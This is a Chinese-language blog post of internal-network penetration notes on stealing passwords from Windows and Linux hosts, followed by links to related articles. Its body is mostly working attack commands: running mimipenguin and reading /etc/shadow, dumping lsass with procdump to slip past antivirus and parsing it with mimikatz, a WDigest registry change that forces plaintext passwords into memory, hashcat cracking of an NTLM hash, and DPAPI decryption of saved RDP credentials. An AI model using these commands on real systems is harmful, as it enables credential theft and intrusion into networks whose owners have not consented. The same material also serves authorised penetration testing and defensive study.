【内网安全】Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取

已于 2024-07-03 10:01:31 修改
阅读量1.6k 收藏 3
点赞数
分类专栏: # 内网渗透 文章标签: 内网渗透 RDP
于 2023-04-08 16:59:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/130024800
版权

文章目录

概述

1、Windows-Mimikatz适用环境:

微软为了防止明文密码泄露发布了补丁KB2871997,关闭了Wdigest功能。
当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,
此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
2008 R2版本可以抓取明文密码
在这里插入图片描述
2012 R2 Datacenter 版本抓不到密钥
在这里插入图片描述

2、Linux-mimipenguin适用环境:

Kali 4.3.0 (rolling) x64 (gdm3)
Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
VSFTPd 3.0.3-8+b1 (Active FTP client connections)
Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions)
openssh-server 1:7.3p1-1 (Active SSH connections - sudo usage)

Linux-密码获取-内存读取&密文破解&存储凭证

1、密码读取:
https://github.com/huntergregal/mimipenguin

chmod 755 ./mimipenguin.sh
./mimipenguin.sh

gg 读不出来
在这里插入图片描述
2、密码破解:
cat /etc/shadow
hashcat.exe -a 3 -m 1800 linuxhash.txt pass.txt
加密形式:(通过密文前缀判断)
https://hashcat.net/wiki/doku.php?id=hashcat
linux sha512crypt 6 6 6, SHA512 (Unix)加密方式:

hashcat -m 1800 sha512linux.txt p.txt

linux sha256crypt 5 5 5, SHA256 (Unix)加密方式:

hashcat -m 7400 sha256linux.txt p.txt

linux下md5crypt, MD5 (Unix), Cisco-IOS 1 1 1 (MD5)加密方式:

hashcat -m 500 linuxmd5.txt p.txt

inux下bcrypt 2 ∗ 2* 2, Blowfish加密方式:

hashcat -m 3200 linuxmd5.txt p.txt

3、密码存储:SSH密匙-上节课知识点

Windows-密码获取-在线离线读取&密文破解&存储凭证

1、在线读

https://github.com/gentilkiwi/mimikatz

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

2、离线读

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
实验1:针对防护拦截:针对防护拦截(Minikatz被拦截)
Procdump是微软官方的工具,可在命令行将lsass导出且杀软不会拦截

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

在这里插入图片描述

mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full

在这里插入图片描述
实验2:针对高版本但有存储:管理员登陆过,密码留在了内存中

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full

在这里插入图片描述

3、解决高版本

修改注册表+强制锁屏+等待系统管理员重新登录+截取明文密码
修改注册表来让Wdigest Auth保存明文口令方式

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

在这里插入图片描述
在这里插入图片描述
这里模拟用户重新登陆之后,成功抓取明文密码
在这里插入图片描述

4、HASH破解

https://hashcat.net/
https://www.cmd5.com/
https://www.somd5.com/
hashcat cmd5 somd5
在这里插入图片描述

GOD\dbadmin 518b98ad4178a53695dc997aa02d455c
https://www.cnblogs.com/Junglezt/p/16044372.html

-m 密文类型
-a 破解类型
?l 小写
?s 符号
?d 数字

字典破解:

.\hashcat.exe -a 0 -m 1000 .\hash.txt .\pass.txt		#需要密码字典

暴力破解:

hashcat.exe -a 3 -m 1000 518b98ad4178a53695dc997aa02d455c ?l?l?l?l?l?s?s?s?d?d

5、RDP凭据抓取

在这里插入图片描述
查看连接记录:

cmdkey /list

在这里插入图片描述
查找本地的Credentials:

dir /a %userprofile%\appdata\local\microsoft\credentials\*

在这里插入图片描述
Credentials记录guidMasterKey值:

mimikatz dpapi::cred /in:C:\Users\webadmin\appdata\local\microsoft\credentials\5FBB2585F99BA05366F08E52F1C1740B

在这里插入图片描述
19d0d4f3-e495-432c-918a-ade1dc76a5e4
找到guidMasterKey对应的MasterKey:

mimikatz sekurlsa::dpapi

在这里插入图片描述
解密指定的MasterKey凭据:

mimikatz dpapi::cred /in:C:\Users\webadmin\appdata\local\microsoft\credentials\5FBB2585F99BA05366F08E52F1C1740B /masterkey:9c0ed75255d7b011294cb4944560608667e3a19bdf3ee5b0f1a58775a96e3c48aa8e5f2070bb65f774f401b13e548e99181c20dd29a7952c31031e754f59efd2

在这里插入图片描述

总结

windows下:
mimikatz被拦截(杀毒等):进行离线读取
操作系统过高 => 2012:离线读取、修改注册表、对hash值进行破解
利用RDP凭据

linux下:
mimipenguin 读取
hashcat 爆破

An0nymouer
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
哈希密码破解方法汇总
JineD的博客
04-15 1757
其功能强大,支持非常多的格式包括一些CTF中比较偏的Unicode、ROT47...总之就是功能强大,除了加盐值(salt)的hash解不了,几乎其他通杀。网站需要开梯子进去,需要进行人机验证才能帮你破解,但有时候对于一些小的密文却意外的好用,有些小的密文用hashcat跑字典也会跑到死,而这个两秒出结果。用法:先看看密文的特征,然后去上面的网站进行特征对比,找到对应的hash-mode(数字),接着就可以在kali里暴力破解了。正如其名,用于鉴别密文的格式,对那些不熟密码学的人来说挺好的。
Xshell&Xftp;
02-13
1. **多协议支持**:除了SSH,Xshell还支持 Telnet、RDP、Serial等,满足不同环境下的远程访问需求。 2. **多窗口管理**:可以同时打开多个终端窗口,每个窗口对应一个不同的远程服务器,便于多任务并行处理。 3. **...
内网渗透linux&windows密码读取&haschcat破解&ssh&rdp
m0_62207170的博客
05-12 1557
内网渗透linux&windows密码读取&haschcat破解&ssh&rdp
Mimikatz Windows、Linux基本使用
weixin_51741741的博客
12-02 5552
一款密码抓取抓取神器,除了抓取密码之外,听说还可以导出谷歌浏览器的密码,当然第二种我也不会。
【Kali Linux工具篇】Hashcat的基本介绍与使用
最新发布
失心少年
05-11 1754
Hashcat是自称世界上最快的密码恢复工具。它在2015年之前拥有专有代码库,但现在作为免费软件发布。适用于Linux,OS X和Windows的版本可以使用基于CPU或基于GPU的变体。支持hashcat的散列算法有Microsoft LM哈希,MD4,MD5,SHA系列,Unix加密格式,MySQL和Cisco PIX等。GPU的驱动要求最新版hashcat下载地址:https://hashcat.net/files/hashcat-5.1.0.7z。
Kali Linux渗透测试之提权(二)——Fgdump、Mimikatz、WCE
weixin_45116657的博客
08-18 2376
1、Windows身份认证的过程 在登录窗口输入账号和密码后,winlogon.exe会将输入的密码进行lmhash和nthash加密; 然后将加密后的密码与SAM账户数据库进行比对,如果比对匹配,则成功登录操作系统(本地登录); 如果网络中的一台主机尝试远程登录另一台主机,登录的账号和密码也是通过本地计算机将输入的密码进行lmhash和nthash计算,然后将加密后的密文通过网络传输到目标主...
在线hash密码破解网站列表
0ffs3t
11-23 7825
这是一份在线hash密码破解网站列表,支持多种类型的hash密码,目前可破解查询的hash包括:MD5、NTLM、LM、SHA1、SHA 256-512、MySQL、WPA-PSK 。 MD5 MD5Decrypter(uk) Plain-Text Crackfoo -NNC Hashcrack Gdata MD5this MD5crack Noisette Jooml
Xshell 6 &Window;连接Linux必备
12-29
- **功能特性**:Xshell 6 提供了强大的终端模拟功能,支持多种协议如SSH、Telnet、RDP、Serial等,使得用户可以在Windows上如同在Linux终端一样操作。 - **安全性能**:具备加密通信能力,保障数据传输的安全性,...
20211009的win7&10都可以正常被使用RDPWrap-v1.6.2.Win7RDP_SP1_7601_Final.7z
10-09
这个特定的压缩包文件"RDPWrap-v1.6.2.Win7RDP_SP1_7601_Final.7z"表明它包含了适用于Windows 7 SP1(Service Pack 1)的RDPWrap版本1.6.2,这是一款可以绕过微软默认的单个远程桌面会话限制的程序。标题中的日期...
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-21
本篇知识分享主要讲解了如何利用SSH隧道进行内网安全穿越,即内网安全攻防中的端口转发技术。 SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络上安全地执行远程命令和传输数据。SSH隧道是SSH的一种...
ATT&CK 知识库(企业)中文版1
08-03
3. **外部远程服务**:利用未授权的远程访问服务,如RDP(远程桌面协议)或SSH安全外壳),攻击者可以尝试登录到目标系统,尤其是当这些服务的配置不安全时。 4. **硬件添加**:物理地将恶意硬件设备(如USB驱动...
hashcat破解wifi密码(kali)
博客
01-10 2万+
第一步 将网卡处于监听状态 airmon-ng check airmon-ng check kill // 关闭影响监听状态的进程 airmon-ng start wlan0 第二步 扫描可用wifi airodump-ng wlan0mon 第三部 获取wifi的握手包 airodump-ng -c (上一步扫描的CH) --bssid (想要破解wifi的ssid) -w ...
linux读用户密码,Mimipenguin:读取当前登录用户密码(Linux下的Mimikatz)
weixin_36200490的博客
04-29 489
mimipenguinA tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.DetailsTakes advantage of cleartext credentials in memo...
【网络攻防实验】
m0_51490933的博客
12-11 1303
字典种类第一次试验所用的字典是社工字典,通过对某个人已知的信息生成字典利用python cupper.py -i 口令字典生成口令:crunch [charest string] [options]参数:min-len 最小长度字符串。max-len 最大长度字符串。,否则将使用缺省的字符集设置。缺省的设置为小写字符集,大写字符集,数字和特殊字符(符号),如果不按照这个顺序,你将得到自己指定结果。必须指定字符类型或加号的值。options。
内网学习笔记】20、Hashcat 的使用
TeamsSix 的 CSDN 空间
08-31 8238
1、介绍 Hashcat 是一款用于破解密码的工具,据说是世界上最快最高级的密码破解工具,支持 LM 哈希、MD5、SHA 等系列的密码破解,同时也支持 Linux、Mac、Windows 平台。 工具地址:https://hashcat.net 项目地址:https://github.com/hashcat/hashcat 2、安装 Mac Mac 用户直接使用 brew 安装即可 brew install hashcat Linux 对于 Debain 的 Linux,比如 Kali、Ubuntu 可
hashcat使用
M3ng@L的博客
11-09 5066
安装地址 安装hashcat:(linux) git clone https://github.com/hashcat/hashcat.git cd hashcat make office2john.py下载: John: run/office2john.py | Fossies 使用步骤 hashcat与office2john.py配套使用 Step1: 先使用office2john.py对目标文档进行hash提取 并且有文档版本(之后会用到) python2 office2john.py <
Kali-WIFI攻防(七)----WPA密码破解Hashcat
热门推荐
fendo
04-07 2万+
一、工具简介 Hashcat系列软件是比较牛逼的密码破解软件,HashCat主要分为三个版本:Hashcat、oclHashcat-plus、oclHashcat-lite。这三个版本的主要区别是:HashCat只支持CPU破解。oclHashcat-plus支持使用GPU破解多个HASH,并且支持的算法高达77种, oclHashcat-lite只支持使用GPU对单个HASH进行破解
hash在线破解
cnbird's blog
03-01 9980
http://cracker.offensive-security.com/index.phphttp://www.objectif-securite.ch/en/products.php
彩虹表-破解哈希算法
世事难料,保持低调
12-28 4380
彩虹表(Rainbow Table)是一种破解哈希算法的技术,它的性能非常让人震惊,在一台普通PC上辅以NVidia CUDA技术,对于NTLM算法可以达到最高每秒103,820,000,000次明文尝试(超过一千亿次),对于广泛使用的MD5也接近一千亿次。更神奇的是,彩虹表技术并非针对某种哈希算法的漏洞进行攻击,而是类似暴力破解,对于任何哈希算法都有效。但是无论怎样, 彩虹表永远是在数据加解密
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值